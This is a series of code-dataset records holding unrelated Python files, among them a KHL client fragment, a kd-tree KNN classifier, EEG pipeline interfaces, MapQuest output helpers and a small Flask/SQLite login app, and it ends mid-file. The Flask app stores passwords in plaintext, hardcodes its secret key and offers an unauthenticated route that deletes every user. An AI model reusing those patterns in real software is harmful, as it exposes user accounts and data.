public_channel_factory(_gate_=self.gate, **channel_data)\n\n async def fetch_user(self, user_id: str) -> User:\n return User(_gate_=self.gate, _lazy_loaded_=True, **(await self.gate.exec_req(api.User.view(user_id))))\n\n async def delete_channel(self, channel: Union[Channel, str]):\n return await self.gate.exec_req(api.Channel.delete(channel if isinstance(channel, str) else channel.id))\n\n async def list_guild(self) -> List[Guild]:\n \"\"\"list guilds which the client joined\"\"\"\n guilds_data = (await self.gate.exec_pagination_req(api.Guild.list()))\n return [Guild(_gate_=self.gate, _lazy_loaded_=True, **i) for i in guilds_data]\n\n async def list_game(self,\n *,\n begin_page: int = 1,\n end_page: int = None,\n page_size: int = 50,\n sort: str = '') -> List[Game]:\n games = await self.gate.exec_pagination_req(api.game(),\n begin_page=begin_page,\n end_page=end_page,\n page_size=page_size,\n sort=sort)\n return [Game(**game_data) for game_data in games]\n\n async def create_game(self, name, process_name: str, icon: str) -> Game:\n data = {\n 'name': name,\n }\n if process_name is not None:\n data['process_name'] = process_name\n if icon is not None:\n data['icon'] = icon\n game_data = (await self.gate.exec_req(api.Game.create(**data)))\n return Game(**game_data)\n\n async def update_game(self, id: int, name: str, icon: str) -> Game:\n data = {'id': id}\n if name is not None:\n data['name'] = name\n if icon is not None:\n data['icon'] = icon\n game_data = (await self.gate.exec_req(api.Game.update(**data)))\n return Game(**game_data)\n\n async def delete_game(self, game: Union[Game, int]):\n await self.gate.exec_req(api.Game.delete(id=game if isinstance(game, 
int) else game.id))\n\n async def update_playing_game(self, game: Union[Game, int], data_type: int):\n await self.gate.exec_req(api.Game.activity(id=game if isinstance(game, int) else game.id, data_type=data_type))\n\n async def stop_playing_game(self):\n await self.gate.exec_req(api.Game.deleteActivity())\n\n async def start(self):\n await asyncio.gather(self.handle_pkg(), self.gate.run(self._pkg_queue))\n","repo_name":"xiaozhu2007/HackPig520","sub_path":"venv/lib/python3.8/site-packages/khl/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":7692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"6998831690","text":"from domain import metaClass\n\nclass CreateQuoteRequest(metaclass=metaClass.AutoGetSet):\n _attributes = ['sourceCurrency', 'targetCurrency', 'targetAmount', 'sourceAmount', 'profile']\n def __init__(self):\n self._sourceCurrency = None\n self._targetCurrency = None\n self._targetAmount = None\n self._sourceAmount = None\n self._profile = 16727665\n\n \n \n \n \n\n \n \n\n \n ","repo_name":"sandiaaVsivam/wwc","sub_path":"domain/CreateQuoteRequest.py","file_name":"CreateQuoteRequest.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"35185203045","text":"from pypureclient.flashblade import GroupQuota\n\nfile_system_name = \"quotaFs\"\n\n# Add a quota of 1024000 for the file system to apply to the groups with ids 998 and 999\nres = client.post_quotas_groups(file_system_names=[file_system_name], gids=[998, 999],\n quota=GroupQuota(quota=1024000))\n# print the created quotas\nprint(res)\nif type(res) == pypureclient.responses.ValidResponse:\n print(list(res.items))\n\n# Add a quota of 2048000 for the file system to apply to the groups with names group1 and group2\nres = client.post_quotas_groups(file_system_names=[file_system_name],\n group_names=[\"group1\", \"group2\"],\n quota=GroupQuota(quota=2048000))\n# print the created quotas\nprint(res)\nif type(res) == pypureclient.responses.ValidResponse:\n print(list(res.items))\n# Other valid fields: file_system_ids\n# See section \"Common Fields\" for examples\n","repo_name":"PureStorage-OpenConnect/py-pure-client","sub_path":"docs/source/examples/FB2.0/post_quotas_groups.py","file_name":"post_quotas_groups.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"19"} +{"seq_id":"73097977322","text":"# -*-coding:utf-8-*-\n# Project: CH03\n# Filename: perceptron\n# Author: DMAN\n# Dataset: breast cancer\n\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn.model_selection import train_test_split\nfrom collections import Counter\nimport numpy as np\nimport heapq\n\n\ndata = load_breast_cancer()\nx = data[\"data\"]\ny = data[\"target\"]\nnumber_features = len(x[0])\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)\n\n\nclass KNN:\n def __init__(self, data, target, k):\n self.data = data\n self.target = target\n self.k = k\n\n @staticmethod\n def distance(x, y):\n return np.linalg.norm(x - y)\n\n def predict(self, x):\n result = []\n for y, label in zip(self.data, self.target):\n result.append([self.distance(x, y), label])\n most_k = heapq.nsmallest(self.k, result, lambda x: x[0])\n\n labels = Counter(np.array(most_k)[:, 1])\n return int(labels.most_common(1)[0][0])\n\n def test(self, data, target):\n total = 0\n correct = 0\n for x, y in 
zip(data, target):\n if self.predict(x) == y:\n correct += 1\n total += 1\n return correct / total\n\n\nclass TreeNode:\n def __init__(self, data, target):\n self.data = data\n self.target = target\n self.right = None\n self.left = None\n\n\nclass Kd_Tree:\n def __init__(self, data, target):\n dimension = data.shape[1]\n data = np.concatenate((data, target.reshape(-1, 1)), axis=1)\n sort_dimension = 0\n self.root = self.build(data, dimension, sort_dimension)\n\n def build(self, data, d, k):\n if len(data) == 0:\n return None\n elif len(data) == 1:\n return TreeNode(data[0][:-1], data[0][-1])\n else:\n data = sorted(data, key=lambda x: x[k])\n mid = len(data) // 2\n root = TreeNode(data[mid][:-1], data[mid][-1])\n root.left = self.build(data[:mid], d, (k + 1) % d)\n root.right = self.build(data[mid + 1:], d, (k + 1) % d)\n return root\n\n def MinNode(self, node, data):\n distance = KNN.distance(node.data, data)\n if distance < self.min_distance:\n self.min_distance = distance\n self.min_target = node.target\n\n def find(self, root, d, k, data):\n if root.data[k] < data[k]:\n if root.right != None:\n self.find(root.right, d, (k + 1) % d, data)\n # case a\n self.MinNode(root, data)\n\n # case b\n if root.left != None:\n distance = KNN.distance(root.left.data, data)\n if distance < self.min_distance:\n self.MinNode(root.left, data)\n self.find(root.left, d, (k + 1) % d, data)\n else:\n self.MinNode(root, data)\n\n else:\n if root.left != None:\n self.find(root.left, d, (k + 1) % d, data)\n # case a\n self.MinNode(root, data)\n\n # case b\n if root.right != None:\n distance = KNN.distance(root.right.data, data)\n if distance < self.min_distance:\n self.MinNode(root.right, data)\n self.find(root.right, d, (k + 1) % d, data)\n else:\n self.MinNode(root, data)\n\n def search(self, data):\n self.min_distance = KNN.distance(data, self.root.data)\n self.min_target = self.root.target\n\n # search begin\n self.find(self.root, len(data), 0, data)\n return self.min_target\n\n def test(self, testdata, testtarget):\n total = 0\n correct = 0\n for x, y in zip(testdata, testtarget):\n total += 1\n if self.search(x) == y:\n correct += 1\n return correct / total\n\n\nif __name__ == \"__main__\":\n # model = KNN(x_train, y_train, 7)\n # print(\"Accuracy : {:.2f}%\".format(100 * model.test(x_test, y_test)))\n model = Kd_Tree(x_train, y_train)\n print(\"Accuracy : {:.2f}%\".format(100 * model.test(x_test, y_test)))\n","repo_name":"Dmaner/Statistical-learning-method","sub_path":"Chapter3/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36521554696","text":"\"\"\"\nUtility functions for data methods\n\"\"\"\n\nimport inspect\nfrom typing import Callable\n\n\ndef nested_flatten(data):\n flatten_data = []\n\n def _nested_flatten(data):\n if type(data) is dict:\n for key in data:\n _nested_flatten(data[key])\n elif type(data) is tuple:\n for el in data:\n _nested_flatten(el)\n else:\n flatten_data.append(data)\n\n _nested_flatten(data)\n return flatten_data\n\n\ndef renest_flat(shape_data, flat_data):\n def _renester(data):\n if type(data) is dict:\n res = {}\n for key in data:\n res[key] = _renester(data[key])\n return res\n elif type(data) is tuple:\n res = []\n for el in data:\n res.append(_renester(el))\n return tuple(res)\n else:\n return flat_data.pop(0)\n\n res = _renester(shape_data)\n\n return res\n\n\ndef nested_apply(data, func_lambda, *func_args, **func_kwargs):\n 
flattened_data = nested_flatten(data)\n flattened_data = list(map(\n lambda el: func_lambda(el, *func_args, **func_kwargs),\n flattened_data))\n return renest_flat(data, flattened_data)\n\n\ndef nestize(f, *func_args, **func_kwargs):\n return lambda el: nested_apply(el, f, *func_args, **func_kwargs)\n\n\ndef nested_slice(data, slicer):\n def _slicer(el):\n return el[slicer]\n return nested_apply(data, _slicer)\n\n\ndef get_data_batch_size(full_data=None, flat_data=None):\n if full_data is None and flat_data is None:\n raise ValueError(\n \"At least one of full_data or flat_data needs not be None.\")\n if full_data is not None and flat_data is not None:\n raise ValueError(\"Can't specify both full_data and flat_data.\")\n if full_data is not None:\n flat_data = nested_flatten(full_data)\n lengths = set(map(lambda el: len(el), flat_data))\n if len(lengths) > 1:\n raise ValueError(f\"Inconsistent element sizes: {lengths}\")\n return lengths.pop()\n\n\ndef nested_batcher(data_gen, batch_size, stack_method, drop_remainder=True):\n it = iter(data_gen())\n while True:\n flat_batch_data = None\n flat_batch_shape = None\n num_collected = 0\n try:\n # Fill up batches\n while True:\n el = next(it)\n el_flat = nested_flatten(el)\n if flat_batch_data is None:\n flat_batch_shape = el\n flat_batch_data = list(\n map(lambda e: list(),\n el_flat))\n for i in range(len(el_flat)):\n flat_batch_data[i].append(el_flat[i])\n num_collected += 1\n if num_collected >= batch_size:\n break\n except StopIteration:\n # Catch stop iteration for partial batches\n pass\n if drop_remainder and num_collected != batch_size:\n # Exit now and don't yield\n break\n # if we have a non-empty batch, yield it.\n if flat_batch_data is not None and \\\n len(flat_batch_data) > 0:\n flat_batch_data = list(map(\n stack_method,\n flat_batch_data))\n yield renest_flat(\n flat_batch_shape,\n flat_batch_data)\n else:\n break\n\n\ndef nested_unbatcher(data_gen):\n it = iter(data_gen())\n while True:\n try:\n d = next(it)\n except StopIteration:\n return\n flat_d = nested_flatten(d)\n length = get_data_batch_size(flat_data=flat_d)\n for i in range(length):\n new_d = list(map(lambda el: el[i], flat_d))\n yield renest_flat(d, new_d)\n\n\ndef taker(gen_func, n):\n i = 0\n it = iter(gen_func())\n while i < n:\n try:\n yield next(it)\n i += 1\n except StopIteration:\n return\n return\n\n\ndef skiper(gen_func, n):\n i = 0\n it = iter(gen_func())\n while i < n:\n try:\n next(it)\n i += 1\n except StopIteration:\n return\n while True:\n try:\n yield next(it)\n except StopIteration:\n return\n\n\ndef function_inspection(func: Callable):\n if not callable(func):\n raise ValueError(\"Argument should be a function.\")\n\n sig = inspect.signature(func)\n params = sig.parameters\n\n explicit_args = 0\n var_args = False\n keyword_args = 0\n var_kwargs = False\n\n for _, param in params.items():\n if param.kind == param.POSITIONAL_OR_KEYWORD:\n if param.default == inspect.Parameter.empty:\n explicit_args += 1\n else:\n keyword_args += 1\n elif param.kind == param.VAR_POSITIONAL:\n var_args = True\n elif param.kind == param.VAR_KEYWORD:\n var_kwargs = True\n\n return {\n 'signature': sig,\n 'n_args': explicit_args,\n 'var_args': var_args,\n 'n_kwargs': keyword_args,\n 'var_kwargs': var_kwargs,\n }\n\n\ndef promote_function(func):\n def promoted_func(x, y, *args, **kwargs):\n return func(x, *args, **kwargs), \\\n func(y, *args, **kwargs)\n return promoted_func\n\n\ndef func_source_extract(func):\n # Get source code for a given function,\n # and format it in a 
consistent way for\n    # building custom transformations.\n    #\n    # Args:\n    #     func: The function whose source to extract.\n\n    # Get the source code\n    code_string = inspect.getsource(func)\n\n    # Possibly strip leading spaces\n    code_lines = code_string.split('\\n')\n\n    init_strip = code_lines[0]\n\n    for line in code_lines[1:]:\n        i = 0\n        while i < len(init_strip) and \\\n                i < len(line) and \\\n                init_strip[i] == line[i]:\n            i += 1\n        if i == len(init_strip) or \\\n                i == len(line):\n            continue\n\n        init_strip = init_strip[:i]\n\n    if len(init_strip) > 0:\n        code_lines = list(map(\n            lambda line: line[len(init_strip):],\n            code_lines))\n\n    return '\\n'.join(code_lines)\n","repo_name":"ncsa/DRYML","sub_path":"src/dryml/data/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":6184,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"72169108843","text":"# output_typing.py\n# Handles output classes and prints\n#\n# ICS 32 Spring 2017\n# Gerald Berzuela\n\n\nimport MapQuest_API\n\n\nclass steps:\n    def print_steps(json_response: 'json') -> None:\n        ''' Iterates through the JSON dictionary to find and print the steps '''\n        try:\n            print('\\nDIRECTIONS')\n            for items in json_response['route']['legs']: \n                for obj in items['maneuvers']: \n                    print(obj['narrative'])\n\n        except KeyError:\n            print('NO ROUTE FOUND')\n\n\nclass totaldistance:\n    def print_distance(json_response: 'json') -> None:\n        ''' Simply prints the total distance of the journey '''\n        try:\n            print('\\nTOTAL DISTANCE: ', end = '')\n            print(str(round(json_response['route']['distance'])) + ' miles')\n\n        except KeyError:\n            print('NO ROUTE FOUND')\n\n\nclass totaltime:\n    def print_time(json_response: 'json') -> None:\n        '''\n        Finds the total time which I saw to be in seconds,\n        used integer division to convert to minutes\n        '''\n        try:\n            print('\\nTOTAL TIME: ', end = '')\n            print(str(json_response['route']['time'] // 60) + ' minutes')\n\n        except KeyError:\n            print('NO ROUTE FOUND')\n\n\nclass latlong:\n    def print_latlong(json_response: 'json') -> None:\n        '''\n        Finds lat and long within the JSON response\n        and formats to two decimal places\n        '''\n        try:\n            print('\\nLATLONGS')\n            for items in json_response['route']['locations']:\n                \n                lat = float('{0:.2f}'.format(items['latLng']['lat']))\n                lng = float('{0:.2f}'.format(items['latLng']['lng']))\n\n                '''\n                Checks to see if lat or long is negative\n                Gets absolute value and returns a string with\n                correct cardinal direction\n                '''\n                if lat < 0 :\n                    lat = str(abs(lat)) + ' S'\n                else:\n                    lat = str(lat) + ' N'\n                \n                if lng < 0:\n                    lng = str(abs(lng)) + ' W'\n                else:\n                    lng = str(lng) + ' E'\n                \n                print(lat + ' ' + lng )\n\n        except KeyError:\n            print('NO ROUTE FOUND')\n    \n\nclass elevation:\n    def print_elevation(json_response: 'json') -> None:\n        '''\n        This function stores the latlongs of each location into a nested list\n        It then sends each latlong to build the elevation URL and prints\n        elevation individually.\n        '''\n        latlng = []\n        \n        try:\n            for items in json_response['route']['locations']:\n                latlng.append([items['latLng']['lat'], items['latLng']['lng']])\n\n            print('\\nELEVATIONS')\n            for i in range(len(latlng)):\n                elevation_URL = MapQuest_API.build_elevation_URL(latlng[i])\n                elevation_json = MapQuest_API.build_response(elevation_URL)\n\n                for items in elevation_json['elevationProfile']:\n                    print(str(round(items['height'] * 3.28)))\n            \n        except KeyError:\n            print('NO ROUTE FOUND')\n    \n","repo_name":"gberzuela/College-Assignments","sub_path":"ICS32/Project 
3_MapQuest/output_typing.py","file_name":"output_typing.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15682694906","text":"import numpy as np\nfrom pylab import *\nimport random\n\nN=7000\nM=95\n\npre_throughput=np.loadtxt('allData/throughput.txt')\n#print(len(pre_throughput))\nspeed =np.loadtxt('allData/speed.txt')\ndistance =np.loadtxt('allData/distance1.txt')\nacce=np.loadtxt('allData/acce.txt')\n\n# rescale each row onto a fixed range\nthroughput=np.zeros([M,50])\nfor i in range(len(throughput)):\n    min_data=np.min(pre_throughput[i])\n    max_data=np.max(pre_throughput[i])\n    for j in range(len(throughput[0])):\n        throughput[i][j]=2*pre_throughput[i][j]/(max_data-min_data)+(0.5*max_data-2.5*min_data)/(max_data-min_data)\n\n\ntrain_throughput=np.zeros([N,50])\ntrain_speed=np.zeros([N,50])\ntrain_distance=np.zeros([N,50])\ntrain_acce=np.zeros([N,50])\n\nfor i in range(len(train_throughput)):\n    train_throughput[i]=throughput[i%M]\n    train_speed[i]=speed[i%M]\n    train_distance[i]=distance[i%M]\n    train_acce[i] =acce[i%M]","repo_name":"yuwangwhu/Neural-ABR-Video-Streaming-for-UAV","sub_path":"LoadDatabefore.py","file_name":"LoadDatabefore.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"30101355827","text":"# Write a program that finds the position of the second\r\n# occurrence of a string in a list, or reports that there is none\r\n\r\n\r\n\r\nmy_list = [\"123\",\"qwe\",\"23414\",\"asdfaddsd\",\"123\"]\r\nnum=(input(\"enter a value: \"))\r\nflag = -1\r\nfor i in range(len(my_list)):\r\n    if (my_list[i]==num):\r\n        flag+=1\r\n        if flag==1:\r\n            print (i)\r\n            break\r\nelse:\r\n    print(-1)\r\n\r\n\r\n# my_list = [\"123\",\"qwe\",\"23414\",\"asdfaddsd\",\"123\"]\r\n# num=(input(\"enter a value: \"))\r\n# list1=[i for i,num in enumerate(my_list)]\r\n# if len(list1)>1:\r\n#     print(list1[1])\r\n# else:\r\n#     print(-1)\r\n","repo_name":"allcabar88/Python","sub_path":"21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17958308474","text":"import os\nimport pickle\n\nimport nibabel\nimport numpy as np\nfrom nipype.interfaces import io as nio\nfrom nipype.interfaces.base import (\n    BaseInterface, BaseInterfaceInputSpec,\n    TraitedSpec, traits\n)\n\nfrom cmtklib.interfaces import pycartool as cart\n\n\nclass CreateRoisInputSpec(BaseInterfaceInputSpec):\n    subject = traits.Str(desc=\"subject\", mandatory=True)\n\n    bids_dir = traits.Str(desc=\"base directory\", mandatory=True)\n\n    parcellation = traits.Str(desc=\"parcellation scheme\", mandatory=True)\n\n    cartool_dir = traits.Str(desc=\"Cartool directory\", mandatory=True)\n\n    cmp3_dir = traits.Str(desc=\"CMP3 directory\", mandatory=True)\n\n    output_query = traits.Dict(desc=\"BIDSDataGrabber output_query\", mandatory=True)\n\n    derivative_list = traits.List(exists=True, desc=\"List of derivatives to add to the datagrabber\", mandatory=True)\n\n\nclass CreateRoisOutputSpec(TraitedSpec):\n    output_query = traits.Dict(desc=\"BIDSDataGrabber output_query\", mandatory=True)\n\n    derivative_list = traits.List(exists=True, desc=\"List of derivatives to add to the datagrabber\", mandatory=True)\n\n\nclass CreateRois(BaseInterface):\n    \"\"\"Create Cartool-reconstructed sources / parcellation ROI mapping files.\n\n    Examples\n    --------\n    >>> from cmtklib.interfaces.eeg import 
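The nested loop in LoadDatabefore.py above maps each row of pre_throughput linearly onto the interval [0.5, 2.5] (the row minimum lands on 0.5, the row maximum on 2.5). An equivalent vectorized form, shown with stand-in data since the allData files are not available here:

import numpy as np

pre_throughput = np.random.rand(95, 50)  # stand-in for np.loadtxt('allData/throughput.txt')
row_min = pre_throughput.min(axis=1, keepdims=True)
row_max = pre_throughput.max(axis=1, keepdims=True)
# algebraically identical to 2*x/(max-min) + (0.5*max - 2.5*min)/(max-min)
throughput = 0.5 + 2.0 * (pre_throughput - row_min) / (row_max - row_min)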
CreateRois\n >>> createrois = CreateRois()\n >>> createrois.inputs.subject = 'sub-01'\n >>> createrois.inputs.bids_dir = '/path/to/bids_dataset'\n >>> createrois.inputs.parcellation = {'label':'L2008', 'desc':'scale1'}\n >>> createrois.inputs.cartool_dir = 'Cartool-v3.80'\n >>> createrois.inputs.cmp3_dir = 'cmp-v3.0.3'\n >>> createrois.inputs.output_query = {}\n >>> createrois.inputs.derivative_list = []\n >>> createrois.run() # doctest: +SKIP\n\n \"\"\"\n\n input_spec = CreateRoisInputSpec\n output_spec = CreateRoisOutputSpec\n\n def _run_interface(self, runtime):\n subject = self.inputs.subject\n parcellation_image_path = self.inputs.parcellation\n parcellation_name = parcellation_image_path.split(\"/\")[-1].split(\".\")[0]\n cartool_dir = os.path.join(self.inputs.bids_dir, \"derivatives\", self.inputs.cartool_dir)\n cmp3_dir = os.path.join(self.inputs.bids_dir, \"derivatives\", self.inputs.cmp3_dir)\n self.derivative_list = self.inputs.derivative_list\n self.output_query = self.inputs.output_query\n\n self._create_roi_files(subject, parcellation_image_path, parcellation_name, cartool_dir, cmp3_dir)\n\n self.derivative_list.append(self.inputs.cartool_dir)\n\n self.output_query[\"rois\"] = {\n # 'scope': 'cartool-v3.80',\n \"extension\": [\"pickle.rois\"]\n }\n self.output_query[\"src\"] = {\n # 'scope': 'cartool-v3.80',\n \"extension\": [\"spi\"]\n }\n self.output_query[\"invsol\"] = {\n # 'scope': 'cartool-v3.80',\n \"extension\": [\"LAURA.is\"]\n }\n\n return runtime\n\n @staticmethod\n def _create_roi_files(subject, parcellation, parcellation_name, cartool_dir, cmp3_dir):\n spipath = os.path.join(cartool_dir, subject, \"eeg\", subject + \"_eeg.spi\")\n source = cart.source_space.read_spi(spipath)\n\n impath = os.path.join(parcellation)\n im = nibabel.load(impath)\n imdata = im.get_fdata()\n x, y, z = np.where(imdata)\n center_brain = [np.mean(x), np.mean(y), np.mean(z)]\n source.coordinates[:, 0] = -source.coordinates[:, 0]\n source.coordinates = source.coordinates - source.coordinates.mean(0) + center_brain\n\n xyz = source.get_coordinates()\n xyz = np.round(xyz).astype(int)\n num_spi = len(xyz)\n\n # label positions\n rois_file = np.zeros(num_spi)\n x_roi, y_roi, z_roi = np.where((imdata > 0) & (imdata < np.unique(imdata)[-1]))\n\n # For each coordinate\n for spi_id, spi in enumerate(xyz):\n distances = ((spi.reshape(-1, 1) - [x_roi, y_roi, z_roi]) ** 2).sum(0)\n roi_id = np.argmin(distances)\n rois_file[spi_id] = imdata[x_roi[roi_id], y_roi[roi_id], z_roi[roi_id]]\n\n groups_of_indexes = [np.where(rois_file == roi)[0].tolist() for roi in np.unique(rois_file)]\n names = [str(int(i)) for i in np.unique(rois_file) if i != 0]\n\n rois_file_new = cart.regions_of_interest.RegionsOfInterest(\n names=names, groups_of_indexes=groups_of_indexes, source_space=source\n )\n\n rois_dir = os.path.join(cartool_dir, subject, \"eeg\", \"Rois\")\n if not os.path.isdir(rois_dir):\n os.mkdir(rois_dir)\n filename_pkl = os.path.join(rois_dir, parcellation_name + \".pickle.rois\")\n filehandler = open(filename_pkl, \"wb\")\n pickle.dump(rois_file_new, filehandler)\n filehandler.close()\n\n def _list_outputs(self):\n outputs = self._outputs().get()\n outputs[\"output_query\"] = self.output_query\n outputs[\"derivative_list\"] = self.derivative_list\n return outputs\n\n\nclass EEGLoaderInputSpec(BaseInterfaceInputSpec):\n base_directory = traits.Directory(exists=True, desc=\"BIDS data directory\", mandatory=True)\n\n subject = traits.Str(desc=\"subject\", mandatory=True)\n\n invsol_format = 
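The per-point loop in _create_roi_files above computes an argmin over all labelled voxels for every source point, which is O(points x voxels). A KD-tree performs the same nearest-voxel lookup far faster; a hedged sketch with synthetic coordinates (scipy is an extra dependency that eeg.py itself does not import):

import numpy as np
from scipy.spatial import cKDTree

voxels = np.random.randint(0, 100, size=(5000, 3))   # labelled voxel coordinates
points = np.random.randint(0, 100, size=(300, 3))    # source-space points
_, nearest = cKDTree(voxels).query(points)           # index of the closest voxel per point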
traits.Enum(\"Cartool-LAURA\", \"Cartool-LORETA\", \"mne-sLORETA\", desc=\"Cartool vs mne\")\n\n    output_query = traits.Dict(desc=\"output query for BIDSDataGrabber\", mandatory=True)\n\n    derivative_list = traits.List(exists=True, desc=\"List of derivatives to add to the datagrabber\", mandatory=True)\n\n    verbose_mode = traits.Bool(False, desc=\"Print extra information\")\n\n\nclass EEGLoaderOutputSpec(TraitedSpec):\n    EEG = traits.List(exists=True, desc=\"eeg * epochs in .fif format\", mandatory=True)\n    src = traits.List(\n        exists=True, desc=\"src (spi loaded with pycartool or source space created with MNE)\", mandatory=True\n    )\n    invsol = traits.List(exists=True, desc=\"Inverse solution (.is file loaded with pycartool)\", mandatory=False)\n    rois = traits.List(exists=True, desc=\"parcellation scheme\", mandatory=True)\n    bem = traits.List(exists=True, desc=\"boundary surfaces for MNE head model\", mandatory=False)\n\n\nclass EEGLoader(BaseInterface):\n    \"\"\"Load the EEG recording, source space, inverse solution and ROI files via a BIDSDataGrabber.\n\n    Examples\n    --------\n    >>> from cmtklib.interfaces.eeg import EEGLoader\n    >>> eeg_loader = EEGLoader()\n    >>> eeg_loader.inputs.base_directory = '/path/to/bids_dataset'\n    >>> eeg_loader.inputs.subject = 'sub-01'\n    >>> eeg_loader.inputs.invsol_format = 'Cartool-LAURA'\n    >>> eeg_loader.inputs.output_query = {\n    ...     \"rois\" : {\"extension\": [\"pickle.rois\"]},\n    ...     \"src\" : {\"extension\": [\"spi\"]},\n    ...     \"invsol\" : {\"extension\": [\"LAURA.is\"]}\n    ... }\n    >>> eeg_loader.inputs.derivative_list = ['/path/to/cartool/derivatives']\n    >>> eeg_loader.run() # doctest: +SKIP\n\n    \"\"\"\n    input_spec = EEGLoaderInputSpec\n    output_spec = EEGLoaderOutputSpec\n\n    def _run_interface(self, runtime):\n        self.base_directory = self.inputs.base_directory\n        self.subject = self.inputs.subject\n        self.derivative_list = self.inputs.derivative_list\n        self._run_datagrabber()\n        return runtime\n\n    def _run_datagrabber(self):\n        bidsdatagrabber = nio.BIDSDataGrabber(\n            index_derivatives=False,\n            extra_derivatives=[os.path.join(self.base_directory, \"derivatives\", elem)\n                               for elem in self.derivative_list],\n        )\n        bidsdatagrabber.inputs.base_dir = self.base_directory\n        bidsdatagrabber.inputs.subject = self.subject.split(\"-\")[1]\n        bidsdatagrabber.inputs.output_query = self.inputs.output_query\n        if self.inputs.verbose_mode:\n            print(bidsdatagrabber.inputs.output_query)\n            print(bidsdatagrabber.inputs.base_dir)\n            print(bidsdatagrabber.inputs.subject)\n        self.results = bidsdatagrabber.run()\n\n    def _list_outputs(self):\n        outputs = self._outputs().get()\n        for key, value in self.results.outputs.get().items():\n            outputs[key] = value\n        return outputs\n","repo_name":"SergeDmi/connectomemapper3","sub_path":"cmtklib/interfaces/eeg.py","file_name":"eeg.py","file_ext":"py","file_size_in_byte":8089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"15652784787","text":"from flask import Flask, render_template,url_for,request,session,redirect\nimport sqlite3 \nfrom prettytable import PrettyTable\napp = Flask(__name__,static_folder='./templates/')\napp.secret_key = 'itissecectkey'\n@app.route('/')\ndef home():\n    return render_template('index.html')\n@app.route('/delete',methods = [\"POST\",\"GET\"])\ndef delete():\n    conn = sqlite3.connect(\"database.db\") \n    cur = conn.cursor()\n    cur.execute(\"DELETE from user\")\n    conn.commit()\n    return render_template('index.html')\n\n@app.route('/register')\ndef register():\n    return 
render_template('register.html')\n\n@app.route('/addrec',methods = [\"POST\",\"GET\"])\ndef addrec():\n if request.method == \"POST\":\n try :\n ID = request.form[\"username\"]\n sec = request.form[\"password\"]\n\n\n with sqlite3.connect(\"database.db\") as conn:\n cur= conn.cursor()\n cur.execute(\"INSERT INTO user (ID,num,eschar,slough,granulation) VALUES (?,?,?,?,?)\", (ID,sec,0,0,0))\n conn.commit()\n msg = \"successfully add\"\n except:\n conn.rollback()\n msg = \"error in insert\"\n finally:\n conn.close()\n return render_template(\"result.html\",msg=msg)\n \n\n@app.route('/login',methods = [\"POST\",\"GET\"])\ndef login():\n msg = ''\n if request.method == 'POST' and 'username' in request.form and 'password' in request.form:\n ID = request.form[\"username\"]\n sec = request.form[\"password\"]\n print(ID,sec)\n\n conn = sqlite3.connect(\"database.db\") \n conn.row_factory = sqlite3.Row\n cur = conn.cursor()\n cur.execute('SELECT * FROM user WHERE ID = ? AND num = ?',(ID,sec))\n\n acc = cur.fetchone()\n if acc:\n session['loggedin'] = True\n session['id'] = acc['ID']\n session['sec'] = acc['num']\n msg = 'logged in successfully'\n print(\"acc\", acc['ID'])\n return redirect('/analysis')\n # return render_template('analysis.html',msg=acc['num'])\n else:\n msg = 'incorrect id / password'\n # msg = rows\n return render_template('login.html',msg = msg) \n \n@app.route('/logout')\ndef logout():\n session.pop('loggedin', None)\n session.pop('id', None)\n session.pop('sec', None)\n return redirect(url_for('login'))\n\n\n@app.route('/list')\ndef list():\n conn = sqlite3.connect(\"database.db\") \n conn.row_factory = sqlite3.Row\n cur = conn.cursor()\n cur.execute(\"select * from user\")\n rows = cur.fetchall()\n \n return render_template('list.html',rows=rows)\n@app.route('/analysis', methods=['GET', 'POST'])\ndef result():\n selected_date = \"NA\"\n if request.method == 'POST':\n selected_date = request.form['date']\n value = session['id'] \n n = 0.6\n s = 8\n g = 3\n conn = sqlite3.connect('database.db')\n cursor = conn.cursor()\n\n query = \"UPDATE user SET eschar =?, slough=?,granulation=? 
WHERE id = ?\"\n    cursor.execute(query,(n,s,g,value))\n    conn.commit()\n    # conn.close()\n    # query = \"SELECT * FROM user\"\n    # cursor.execute(query)\n    # rows = cursor.fetchall()\n    # for row in rows:\n    #     print(row[0])\n    #     print(row[1])\n    #     print(row[2])\n    # print(rows)\n    cursor.close()\n    conn.close()\n\n    return render_template(\"analysis.html\",value = value,date=selected_date)\n\nif __name__ == '__main__':\n    app.run(debug = True)\n","repo_name":"luacy200820/Flask_web","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20548977699","text":"from datetime import datetime\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\ndef get_transcripts_detailes(url):\r\n    response = requests.get(url)\r\n    if response.ok:\r\n        \r\n        soup = BeautifulSoup(response.text)\r\n    else: \r\n        raise Exception(f'response is {response}')\r\n    \r\n    try:\r\n        title = soup.find('h1', {'class': 'font-medium'}).text\r\n    except:\r\n        title = ''\r\n    try:\r\n        ticker = soup.find('a', {'class': 'ticker-symbol'}).text\r\n    except:\r\n        ticker = ''\r\n    try:\r\n        content = soup.find('div', {'class': 'tailwind-article-body'}).text\r\n    except:\r\n        content = ''\r\n    try:\r\n        date = 